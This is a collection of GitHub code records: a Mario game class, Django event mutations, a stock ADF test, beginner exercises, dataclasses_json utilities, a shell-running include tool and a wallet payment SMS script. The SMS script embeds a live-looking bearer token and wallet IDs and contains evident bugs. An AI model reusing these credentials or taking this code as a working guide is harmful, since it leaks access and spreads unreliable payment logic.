== 0:\n if self.power == 0 or self.power == 1:\n self.image.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.power == 2:\n self.flowerimage.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.power == 3:\n if self.star_timer > 0:\n self.star_timer-=200\n if self.star_timer%60000 < 10000:\n self.star1.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%50000 < 10000:\n self.star2.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%40000 < 10000:\n self.star3.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%30000 < 10000:\n self.star4.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%20000 < 10000:\n self.star5.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer%10000 < 10000:\n self.star6.clip_draw(self.frame * self.frame_size_x+self.frame_empty_x, self.frame_y, self.size_x, self.size_y, self.x, self.y,self.mario_size_x,self.mario_size_y)\n elif self.star_timer <= 0:\n self.power = 0\n \n def update(self):\n if self.frame_control==10:\n if self.dir==0:\n if self.jump == True:\n self.frame_control_jump+=1\n if self.frame_control_jump<2:\n self.frame = 0\n elif self.frame_control_jump<3:\n self.frame = 1\n elif self.frame_control_jump<4:\n self.frame = 2\n elif self.frame_control_jump<7:\n self.frame = (self.frame+1)%6\n #self.move_y=0\n if self.frame_control_jump==7:\n self.frame_control_jump=0\n self.jump = False\n self.after()\n elif self.jump == False:\n self.frame = (self.frame+1) % 6\n elif self.dir==1:\n self.frame = (self.frame-1) % 6\n self.frame_control=0\n \n self.frame_control+=1\n \n self.x += self.move_x*2\n self.y += self.move_y\n # if self.jump==True:\n # if self.frame_control_jump<3:\n # self.move_y-=0.8\n # elif self.frame_control_jump<4:\n # self.move_y-=0.8\n # elif self.frame_control_jump==4:\n # self.move_y=0\n # elif self.jump=False:\n \n # if self.state == 0: \n # if self.mario_size_y == 30:\n # if self.y <= 85:\n # self.y=85\n # self.move_y=0\n # elif self.y > 85:\n # self.move_y-=0.8\n # elif self.mario_size_y == 60:\n # if self.y <= 100:\n # self.y=100\n # self.move_y=0\n # elif self.y > 100:\n # self.move_y-=0.8\n if self.mario_size_y == 30:\n if self.y < self.floor-15:\n self.y = self.floor-15\n self.move_y = 0\n elif self.y > self.floor-15:\n self.move_y-=0.8 \n elif self.mario_size_y == 60:\n if self.y < self.floor:\n self.y = self.floor\n self.move_y=0\n elif self.y > self.floor:\n self.move_y-=0.8\n \n\n\n \n if self.move_x >=0.5 and self.move_x<=3:\n self.move_x+=self.run\n elif self.move_x<=-0.5 and self.move_x>=-3:\n self.move_x-=self.run\n \n def right(self):\n self.speed=0.5\n self.move_x+=self.speed\n self.after_jump=1\n if self.jump==True:\n self.frame_size_x=31\n self.frame_empty_x=14\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n if self.jump == False:\n self.frame=0\n self.frame_size_x=34\n self.frame_empty_x=10\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n \n def left(self):\n self.speed=0.5\n self.move_x-=self.speed\n self.after_jump=2\n if self.jump==True:\n self.frame_size_x= -31\n self.frame_empty_x=1059\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n if self.jump == False:\n self.frame=0\n self.frame_size_x= -34\n self.frame_empty_x=1060\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n \n def stop_right(self):\n self.speed=0\n self.move_x=0\n self.after_jump=3\n if self.jump == False:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=16\n self.frame_size_x=27\n self.size_x=29\n self.size_y=40\n\n def stop_left(self):\n self.speed=0\n self.move_x=0\n self.after_jump=4\n if self.jump == False:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=1059\n self.frame_size_x=-27\n self.size_x=29\n self.size_y=40\n\n def left_jump(self):\n if self.jump == False:\n self.frame_control=-1\n self.move_y=16\n self.frame=0\n self.frame_size_x= -31\n self.frame_empty_x=1059\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n self.jump=True\n \n def right_jump(self):\n if self.jump == False:\n self.frame_control=-1\n self.move_y=16\n self.frame=0\n self.frame_size_x=31\n self.frame_empty_x=14\n self.size_x=31\n self.size_y=43\n self.frame_y=2401\n self.jump=True\n \n def after(self):\n if self.after_jump==1:\n self.frame=0\n self.frame_size_x=34\n self.frame_empty_x=10\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n elif self.after_jump==2:\n self.frame=0\n self.frame_size_x= -34\n self.frame_empty_x=1060\n self.size_x=34\n self.size_y=40\n self.frame_y=2340\n elif self.after_jump==3:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=16\n self.frame_size_x=27\n self.size_x=29\n self.size_y=40\n elif self.after_jump==4:\n #self.move_y=0\n self.frame=0\n self.frame_y=2465\n self.frame_empty_x=1059\n self.frame_size_x=-27\n self.size_x=29\n self.size_y=40\n \n def mario_xy(self):\n return self.x,self.y\n\n def input_xy(self,x,y):\n self.x=x\n \n def get_bb(self):\n return self.x-self.mario_size_x/2,self.y-self.mario_size_y/2,self.x+self.mario_size_x/2,self.y+self.mario_size_y/2\n\n def less_size(self):\n if self.timer > 0:\n return 0\n if self.power == 0:\n self.mario_size_x=22\n self.y-=15\n self.mario_size_y=30\n self.power = 1\n elif self.power == 1:\n pass\n elif self.power == 2:\n self.power = 1\n elif self.power == 3:\n self.power = 1\n \n self.timer=20000\n \n def more_size(self):\n if self.power == 1:\n self.mario_size_x=44\n self.y+=15\n self.mario_size_y=60\n self.power = 0\n\n def update_floor(self,y):\n self.floor = y\n\n def mario_return_move_y(self):\n return self.move_y\n\n def mario_move_y(self,y):\n self.move_y = y\n\n def mario_0_state(self):\n self.power = 0\n self.timer=20000\n\n def mario_flower_state(self):\n self.power = 2\n\n def mario_star_state(self):\n self.power = 3\n self.star_timer=70000\n\n def mario_state_return(self):\n return self.power\n\n def mario_stance_timer(self):\n return self.timer\n\n def mario_jump_state(self):\n return self.jump\n\n\n\n\n\n \n","repo_name":"tobing7799/2D-","sub_path":"character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":11434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21616166329","text":"import graphene\nfrom graphene import NonNull\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.exceptions import PermissionDenied, ValidationError\nfrom django.shortcuts import get_object_or_404\nfrom django.utils import timezone\nfrom decorators import login_required, staff_member_required, permission_required\n\nfrom apps.organizations.models import Organization\nfrom apps.organizations.permissions import check_user_membership\n\nfrom .mail import EventEmail\nfrom .models import Category, Event, SignUp\nfrom .types import CategoryType, EventType\n\n\nclass BaseEventInput:\n title = graphene.String(required=True)\n description = graphene.String(required=True)\n start_time = graphene.DateTime(required=True)\n is_attendable = graphene.Boolean(required=True)\n end_time = graphene.DateTime(required=False)\n location = graphene.String(required=False)\n category_id = graphene.ID(required=False)\n image = graphene.String(required=False)\n deadline = graphene.DateTime(required=False)\n signup_open_date = graphene.DateTime(required=False)\n available_slots = graphene.Int(required=False)\n price = graphene.Float(required=False)\n short_description = graphene.String(required=False)\n has_extra_information = graphene.Boolean(required=False)\n contact_email = graphene.String(required=False)\n binding_signup = graphene.Boolean(required=False)\n allowed_grade_years = graphene.List(NonNull(graphene.Int))\n\n\nclass CreateEventInput(BaseEventInput, graphene.InputObjectType):\n organization_id = graphene.ID(required=True)\n\n\nclass UpdateEventInput(BaseEventInput, graphene.InputObjectType):\n title = graphene.String(required=False)\n description = graphene.String(required=False)\n start_time = graphene.DateTime(required=False)\n organization_id = graphene.ID(required=False)\n is_attendable = graphene.Boolean(required=False)\n\n\nclass CreateEvent(graphene.Mutation):\n \"\"\"\n Create a new event\n \"\"\"\n\n ok = graphene.Boolean()\n event = graphene.Field(EventType)\n\n class Arguments:\n event_data = CreateEventInput(required=True)\n\n @permission_required(\"events.add_event\")\n def mutate(self, info, event_data):\n try:\n organization = Organization.objects.get(id=event_data.get(\"organization_id\"))\n except Organization.DoesNotExist:\n raise ValueError(\"Ugyldig forening oppgitt\")\n\n check_user_membership(info.context.user, organization)\n\n event = Event()\n for k, v in event_data.items():\n setattr(event, k, v)\n event.publisher = info.context.user\n event.save()\n ok = True\n return CreateEvent(event=event, ok=ok)\n\n\nclass UpdateEvent(graphene.Mutation):\n \"\"\"\n Updates the event with a given ID with the data in event_data\n \"\"\"\n\n class Arguments:\n id = graphene.ID(required=True)\n event_data = UpdateEventInput(required=False)\n\n ok = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.change_event\")\n def mutate(self, info, id, event_data):\n try:\n event = Event.objects.get(pk=id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n\n for k, v in event_data.items():\n setattr(event, k, v)\n event.save()\n ok = True\n return UpdateEvent(event=event, ok=ok)\n\n\nclass DeleteEvent(graphene.Mutation):\n \"\"\"\n Deletes the event with the given ID\n \"\"\"\n\n class Arguments:\n id = graphene.ID()\n\n ok = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.delete_event\")\n def mutate(self, info, id):\n try:\n event = Event.objects.get(pk=id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n\n event.delete()\n ok = True\n return DeleteEvent(event=event, ok=ok)\n\n\nclass EventSignUpInput(graphene.InputObjectType):\n extra_information = graphene.String(required=False)\n\n\nclass EventSignUp(graphene.Mutation):\n \"\"\"\n Creates a new Sign Up for the user that sent the request, for the event\n with the given ID\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n data = EventSignUpInput(required=False)\n\n is_full = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.add_signup\")\n def mutate(self, info, event_id, data):\n try:\n event: Event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n now = timezone.now()\n\n if now < event.signup_open_date:\n raise Exception(\"Arrangementet er ikke åpent for påmelding enda\")\n if event.deadline is not None and now > event.deadline:\n raise ValidationError(\"Påmelding for arrangementet er stengt\")\n\n user = info.context.user\n\n if not str(user.grade_year) in event.allowed_grade_years:\n raise PermissionDenied(\n \"Kun studenter i følgende trinn kan melde seg på\",\n event.allowed_grade_years,\n )\n\n if SignUp.objects.filter(event_id=event_id, is_attending=True, user_id=info.context.user.id).exists():\n raise Exception(\"Du kan ikke melde deg på samme arrangement flere ganger\")\n\n sign_up = SignUp()\n if data.extra_information:\n setattr(sign_up, \"extra_information\", data.extra_information)\n\n setattr(sign_up, \"timestamp\", now)\n setattr(sign_up, \"is_attending\", True)\n setattr(sign_up, \"event\", event)\n setattr(sign_up, \"user\", user)\n setattr(sign_up, \"user_email\", user.email)\n setattr(sign_up, \"user_allergies\", user.allergies)\n setattr(sign_up, \"user_phone_number\", user.phone_number)\n setattr(sign_up, \"user_grade_year\", user.grade_year)\n\n sign_up.save()\n return EventSignUp(event=event, is_full=event.is_full)\n\n\nclass EventSignOff(graphene.Mutation):\n \"\"\"\n Sets the field is_attending to False in the Sign Up for the user that\n sent the request, for the event with the given ID\n NOTE: The sign up still exists, it is not deleted from the database\n when a user signs off an event\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n\n is_full = graphene.Boolean()\n event = graphene.Field(EventType)\n\n @permission_required(\"events.change_signup\")\n def mutate(self, info, event_id):\n try:\n event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n user = info.context.user\n\n if event.binding_signup and user in event.users_attending:\n raise Exception(\"Du kan ikke melde deg av et arrangement med bindende påmelding.\")\n\n try:\n sign_up = SignUp.objects.get(is_attending=True, user=user, event=event)\n except SignUp.DoesNotExist:\n raise Exception(\"Du er ikke påmeldt\")\n\n setattr(sign_up, \"is_attending\", False)\n sign_up.save()\n return EventSignOff(event=event, is_full=event.is_full)\n\n\nclass AdminEventSignOff(graphene.Mutation):\n \"\"\"\n Sets the field is_attending to False in the Sign Up for the user with the\n given ID, for the event with the given ID\n NOTE: The sign up still exists, it is not deleted from the database\n when a user signs off an event\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n user_id = graphene.ID(required=True)\n\n event = graphene.Field(EventType)\n\n @permission_required(\"events.change_signup\")\n def mutate(self, info, event_id, user_id):\n try:\n event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n\n try:\n user = get_user_model().objects.get(pk=user_id)\n except Event.DoesNotExist:\n raise ValueError(\"Kunne ikke finne brukeren\")\n\n try:\n sign_up = SignUp.objects.get(is_attending=True, user=user, event=event)\n except SignUp.DoesNotExist:\n raise Exception(\"Kunne ikke finne påmeldingen\")\n\n setattr(sign_up, \"is_attending\", False)\n sign_up.save()\n\n return AdminEventSignOff(event=event)\n\n\nclass CategoryInput(graphene.InputObjectType):\n name = graphene.String(required=False)\n\n\nclass CreateCategory(graphene.Mutation):\n \"\"\"\n Create a new event category\n \"\"\"\n\n ok = graphene.Boolean()\n category = graphene.Field(CategoryType)\n\n class Arguments:\n category_data = CategoryInput(required=True)\n\n @staff_member_required\n def mutate(self, info, category_data):\n category = Category()\n for k, v in category_data.items():\n setattr(category, k, v)\n category.save()\n ok = True\n return CreateCategory(category=category, ok=ok)\n\n\nclass UpdateCategory(graphene.Mutation):\n \"\"\"\n Updates the category with a given ID with the data in category_data\n \"\"\"\n\n class Arguments:\n id = graphene.ID(required=True)\n category_data = CategoryInput(required=False)\n\n ok = graphene.Boolean()\n category = graphene.Field(CategoryType)\n\n @staff_member_required\n def mutate(self, info, id, category_data):\n category = get_object_or_404(Category, pk=id)\n\n for k, v in category_data.items():\n setattr(category, k, v)\n category.save()\n ok = True\n return UpdateCategory(category=category, ok=ok)\n\n\nclass DeleteCategory(graphene.Mutation):\n \"\"\"\n Deletes the category with a given ID\n \"\"\"\n\n class Arguments:\n id = graphene.ID()\n\n ok = graphene.Boolean()\n category = graphene.Field(CategoryType)\n\n @staff_member_required\n def mutate(self, info, id):\n category = get_object_or_404(Category, pk=id)\n category.delete()\n ok = True\n return DeleteCategory(category=category, ok=ok)\n\n\nclass SendEventEmails(graphene.Mutation):\n \"\"\"\n Send an email to all users signed up to an event\n \"\"\"\n\n class Arguments:\n event_id = graphene.ID(required=True)\n receiver_emails = graphene.List(NonNull(graphene.String))\n content = graphene.String()\n subject = graphene.String(required=True)\n\n ok = graphene.Boolean()\n\n @login_required\n def mutate(self, info, event_id, receiver_emails: list[str], content: str, subject: str):\n try:\n event = Event.objects.get(pk=event_id)\n except Event.DoesNotExist:\n raise ValueError(\"Ugyldig arrangement\")\n\n check_user_membership(info.context.user, event.organization)\n receiver_emails.append(info.context.user.email)\n\n for i in range(0, len(receiver_emails), settings.EMAIL_MAX_RECIPIENTS):\n EventEmail.send_event_emails(\n receiver_emails[i : i + settings.EMAIL_MAX_RECIPIENTS], content, subject, event\n )\n\n ok = True\n return SendEventEmails(ok=ok)\n","repo_name":"rubberdok/indok-web","sub_path":"backend/apps/events/mutations.py","file_name":"mutations.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"72130480507","text":"\nfrom statsmodels.tsa.stattools import adfuller\nfrom itertools import combinations\nimport pandas as pd \n\n\nPATH_TO_DATA = '../StockData/'\nSTART_DATE = '2018-9-26'\n\n#give it a string and then use the .split(',')\ntickers = \"MMM,ABT,ABBV,ABMD,ACN,ATVI,ADBE,AMD,AAP,AES,AET,AMG,AFL,A,APD,AKAM,ALK,ALB,ARE,ALXN,ALGN,ALLE,AGN,ADS\"\n\ntickers = tickers.strip().split(',')\n\ndfs = [] \n\nfor ticker in tickers:\n\tdfs.append((pd.read_pickle(PATH_TO_DATA + f\"{ticker}.pkl\")[START_DATE:], ticker))\n\nresults = []\ncount = 0\nfor pair in combinations(tickers, 2):\n\tcount += 1 \n\tind1 = tickers.index(pair[0])\n\tind2 = tickers.index(pair[1])\n\n\tdf1 = dfs[ind1][0]\n\tdf2 = dfs[ind2][0]\n\n\t#need to verify they are coming from the correct dataframe\n\tassert pair[0] == dfs[ind1][1]\n\tassert pair[1] == dfs[ind2][1]\n\n\tif len(df1) != len(df2):\n\t\tcontinue \n\n\tresults.append((f\"{pair[0]}, {pair[1]}\", adfuller(df1['close'] - df2['close'])[1]))\n\nresults = sorted(results, key=lambda x: x[1])\nresults = [r for r in results if r[1] < .05]\n\nprint('cointegrated tickers:\\n******************************')\nfor r in results:\n\tprint(r)\n\t\nsig = len(results)\n\nprint(f\"out of {count} pairs, there were {sig} that were statistically significant\\n{sig/count}%\")","repo_name":"clinestanford/USUInvest18-19","sub_path":"bot/Backtesting/ADF_test.py","file_name":"ADF_test.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21925884858","text":"a=int(input(\"rows:\"))\r\nb=a\r\nprint(\"rows=column i.e.\",b)\r\n\r\nfor i in range(1,a+1):\r\n for j in range(1,b+1):\r\n if j<=i:\r\n if j%2!=0:\r\n print(\"1\",end=\"\")\r\n else:\r\n print(\"0\",end='')\r\n else:\r\n print(\" \",end=\"\")\r\n print()\r\n\r\n\r\n'''\r\n1\r\n10\r\n101\r\n1010\r\n10101\r\n101010\r\n'''\r\n\r\n","repo_name":"Debajyoti69/Competitive-Programming","sub_path":"Star pattern/star_pattern23.py","file_name":"star_pattern23.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73483447869","text":"from timeit import default_timer as timer\n# Initiation of strings\n\nstr1 = \"Hello world\"\nprint(str1, \"str1\")\n\nstr2 = 'Sample text'\nprint(str2, \"str2\")\n\n\n# Accessing string\nprint(str1[0], \"first_idx_inplace\")\n\n\n# Looping strings\nfor char in str1:\n print(char, \"loop_str\")\n\n# Slicing strings\nstr1 = str1[1:2]\nprint(str1, \"sliced_string\")\nstr3 = \"Sample\"\nstr3 = str3[::-1]\nprint(str3, \"reverse_string\")\n\n\n#replace\n\nstr4 = \"hello Avinash\"\nstr4 = str4.replace(\"Avinash\", \"Dinesh\")\nprint(str4, \"replace\")\n\n#find and count\n\nstr5 = \"my text\"\nstr5 = str5.find(\"text\")\nprint(str5, \"find_index\")\n\nstr6 = \"abcdddfdefdf\"\nstr6 = str6.count(\"d\")\nprint(str6, 'str6')\n\n# timer\n\nstart = timer()\n\nreverse_char = \"reverse\"\n\nfor char in reverse_char[::-1]:\n reverse_char += char\n\nstop = timer()\n\n\nprint(reverse_char, \"reverse_time1\")\nprint(stop-start, \"time_taken\")\n\n\n#formatting string\n\nsample1 = '''Hello\nhei\nhi'''\n\nprint(sample1, \"multi liner\")\n\nput_this = \"avi\"\n\nprint_this1 = \"hello %s welcome\" % put_this\n\nprint(print_this1, \"percent_formatter\")\n\n\nput_this1 = \"hey\"\n\nprint(\"hello {} {}\".format(put_this1, put_this1), \"string_format\")\n\nmy_string = f'this variable is {put_this}'\n\nprint(my_string, \"-f string\")\n\n#convert string to list and list to string\n\nsample2 = \"hello\"\nsample2 = sample2.split(\"\")\n\nprint(sample2, \"split\")\n\nsample2 = \"\".join(sample2)\n\nprint(sample2, \"join\")","repo_name":"aviabstraction/basics","sub_path":"Algorithms/python_basics/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7087758776","text":"import inspect\nimport sys\nfrom datetime import datetime, timezone\nfrom typing import Collection, Mapping, Optional, TypeVar, Any\n\n\ndef _get_type_cons(type_):\n \"\"\"More spaghetti logic for 3.6 vs. 3.7\"\"\"\n if sys.version_info.minor == 6:\n try:\n cons = type_.__extra__\n except AttributeError:\n try:\n cons = type_.__origin__\n except AttributeError:\n cons = type_\n else:\n cons = type_ if cons is None else cons\n else:\n try:\n cons = type_.__origin__ if cons is None else cons\n except AttributeError:\n cons = type_\n else:\n cons = type_.__origin__\n return cons\n\n\ndef _get_type_origin(type_):\n \"\"\"Some spaghetti logic to accommodate differences between 3.6 and 3.7 in\n the typing api\"\"\"\n try:\n origin = type_.__origin__\n except AttributeError:\n if sys.version_info.minor == 6:\n try:\n origin = type_.__extra__\n except AttributeError:\n origin = type_\n else:\n origin = type_ if origin is None else origin\n else:\n origin = type_\n return origin\n\n\ndef _hasargs(type_, *args):\n try:\n res = all(arg in type_.__args__ for arg in args)\n except AttributeError:\n return False\n except TypeError:\n if type_.__args__ is None:\n return False\n else:\n raise\n else:\n return res\n\n\ndef _isinstance_safe(o, t):\n try:\n result = isinstance(o, t)\n except Exception:\n return False\n else:\n return result\n\n\ndef _issubclass_safe(cls, classinfo):\n try:\n return issubclass(cls, classinfo)\n except Exception:\n return (\n _is_new_type_subclass_safe(cls, classinfo) if _is_new_type(cls) else False\n )\n\n\ndef _is_new_type_subclass_safe(cls, classinfo):\n super_type = getattr(cls, \"__supertype__\", None)\n\n if super_type:\n return _is_new_type_subclass_safe(super_type, classinfo)\n\n try:\n return issubclass(cls, classinfo)\n except Exception:\n return False\n\n\ndef _is_new_type(type_):\n return inspect.isfunction(type_) and hasattr(type_, \"__supertype__\")\n\n\ndef _is_optional(type_):\n return (\n _issubclass_safe(type_, Optional) or _hasargs(type_, type(None)) or type_ is Any\n )\n\n\ndef _is_mapping(type_):\n return _issubclass_safe(_get_type_origin(type_), Mapping)\n\n\ndef _is_collection(type_):\n return _issubclass_safe(_get_type_origin(type_), Collection)\n\n\ndef _is_nonstr_collection(type_):\n return _issubclass_safe(\n _get_type_origin(type_), Collection\n ) and not _issubclass_safe(type_, str)\n\n\ndef _timestamp_to_dt_aware(timestamp: float):\n tz = datetime.now(timezone.utc).astimezone().tzinfo\n dt = datetime.fromtimestamp(timestamp, tz=tz)\n return dt\n\n\ndef _undefined_parameter_action_safe(cls):\n try:\n if cls.dataclass_json_config is None:\n return\n action_enum = cls.dataclass_json_config[\"undefined\"]\n except (AttributeError, KeyError):\n return\n\n if action_enum is None or action_enum.value is None:\n return\n\n return action_enum\n\n\ndef _handle_undefined_parameters_safe(cls, kvs, usage: str):\n \"\"\"\n Checks if an undefined parameters action is defined and performs the\n according action.\n \"\"\"\n undefined_parameter_action = _undefined_parameter_action_safe(cls)\n usage = usage.lower()\n if undefined_parameter_action is None:\n return kvs if usage != \"init\" else cls.__init__\n if usage == \"from\":\n return undefined_parameter_action.value.handle_from_dict(cls=cls, kvs=kvs)\n elif usage == \"to\":\n return undefined_parameter_action.value.handle_to_dict(obj=cls, kvs=kvs)\n elif usage == \"dump\":\n return undefined_parameter_action.value.handle_dump(obj=cls)\n elif usage == \"init\":\n return undefined_parameter_action.value.create_init(obj=cls)\n else:\n raise ValueError(\n f\"usage must be one of ['to', 'from', 'dump', 'init'], \" f\"but is '{usage}'\"\n )\n\n\n# Define a type for the CatchAll field\n# https://stackoverflow.com/questions/59360567/define-a-custom-type-that-behaves-like-typing-any\nCatchAllVar = TypeVar(\"CatchAllVar\", bound=Mapping)\n","repo_name":"DVE2000/Dogbone","sub_path":"py_packages/dataclasses_json/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"6"} +{"seq_id":"33385379053","text":"#!/usr/bin/python\n# coding=utf-8\n\nfrom __future__ import print_function\nimport argparse\nimport os\nimport subprocess\nimport sys\n\n\nclass Processor(object):\n \"\"\"\n :type str markup\n :type str working_directory\n \"\"\"\n\n def __init__(self, working_directory=None, markup='@tsincluder'):\n self.markup = markup\n\n if working_directory is None:\n working_directory = os.getcwd()\n self.working_directory = working_directory\n\n def process(self, line):\n markup = self.markup.strip() + ' '\n if markup in line:\n prefix = line[0:line.rfind(markup)]\n\n shell_command = line.replace(prefix, '').replace(markup, '')\n text = subprocess.Popen(\n shell_command,\n shell=True,\n stdout=subprocess.PIPE,\n cwd=self.working_directory\n ).stdout.read()\n\n rows = text.split('\\n')\n line = ''\n for row in rows:\n if len(row.strip()) != 0:\n line += prefix + row.strip() + '\\n'\n\n return line\n\n\ndef main(arguments):\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('infile', help=\"input file to transform\", type=argparse.FileType('r'))\n args = parser.parse_args(arguments)\n\n processor = Processor()\n for line in args.infile:\n line = processor.process(line)\n print(line, end='')\n\ndef run():\n main(sys.argv[1:])\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"FabienArcellier/tsincluder","sub_path":"tsincluder/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22675821888","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 07 21:36:53 2016\n\n@author: ajatgd\n\"\"\"\n\ndef find(str, ch):\n for i, ltr in enumerate(str):\n if ltr == ch:\n yield i\n \ndef smsRes(request):\n id1=['I8ckg12tIqOpz613Sf/VLPClcVhOTKH2','6lAPqTztmhj/1ml4NmER+KXwJev8eMWN','I8ckg12tIqOpz613Sf/VLPClcVhOTKH2','I8ckg12tIqOpz613Sf/VLPClcVhOTKH2']\n wallet=['4817497275977414861','5622253132157119015','5243188823714477159','5014900270407291489']\n body = request.POST.get('Body', '')\n number = request.POST.get('From','')\n comma_index= list(find(',',body))\n if(body[:8]=='payprem'):\n identity=body[9:comma_index[0]]\n wc=body[comma_index[0]:]\n amt=20\n if (identity in id1) and (wc in wallet):\n confirmpayment(identity,wc,amt)\n \n if(body[:8]=='getsubs'):\n identity=body[9:comma_index[0]]\n wc=body[comma_index[0]:]\n amt=20\n if identity in id1 and wc in wallet:\n banktocus(identity,wc,amt)\n \n r = Response()\n r.message(msg)\ndef confirmpayment(identity,wc,amt):\n \n w2='5622253132157119015'\n payload={\n \"FromWalletCode\": wc,\n \"ToWalletCode\": w2,\n \"Date\": \"20/12/2015\",\n \"Amount\": amt,\n \"Reason\": \"Transfer to test transaction\"\n }\n payld=json.dumps(payload)\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID':'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n print(\"transfer funds 1 to 2\")\n response20= requests.post(url,headers=headers,data=payld)\n response20=json.loads(response20.text)\n print(response20)\n return(str(response20['Message']))\n\n \ndef banktocus(identity,wc,amt):\n w2='5622253132157119015'\n payload={\n \"FromWalletCode\": w2,\n \"ToWalletCode\": wc,\n \"Date\": \"20/12/2015\",\n \"Amount\": amt,\n \"Reason\": \"Transfer to test transaction\"\n }\n payld=json.dumps(payload)\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID':'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n print(\"transfer funds 1 to 2\")\n response9= requests.post(url,headers=headers,data=payld)\n response9=json.loads(response9.text)\n print(response9)\n return(str(response9['Message']))\n \n \n \n \n \ndef trans_his(identity,wc):\n url='https://api.dev.modjadji.org:8243/tipsgo_dev/v1.0.0/api/wallet/GetWalletTransactions?walletCode='+wc+'&startDate=01/01/2015&endDate=04/11/2016&pageNum=0&pageSize=0'\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID':'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n res=requests.get(url,headers=headers)\n res=json.loads(res.text)\n message=str(res['Message'])\n tran_hist=str(res['ListOfObjects'][1]['TranAmount'])\n return(message+'last trans'+tran_hist)\n \n \n \n \ndef wallet_details(identity,wc):\n url='https://api.dev.modjadji.org:8243/tipsgo_dev/v1.0.0/api/wallet/GetWalletInfo?walletCode='+wc\n headers = {'Authorization': 'Bearer qJ8Prj6nXVSxA92xVCu9c4ldekIa', \"Content-Type\": \"application/json\",'deviceID': 'Onion123456789123456789', 'AppId': 'HackathonDemoApp12','InstallationID':identity}\n print(\"wallet 1 updated info\")\n response7= requests.get(url,headers=headers)\n response7=json.loads(response7.text)\n print(response7)\n message=str(response7['Message'])\n bal=str(response7['DataObject']['CurrentBalance'])\n return(message+'current balance'+bal)\n ","repo_name":"ajatgd/finclusion-sms","sub_path":"fincSMS/required_fn.py","file_name":"required_fn.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18842246442","text":"\r\n#program to print all the prime numbers in a 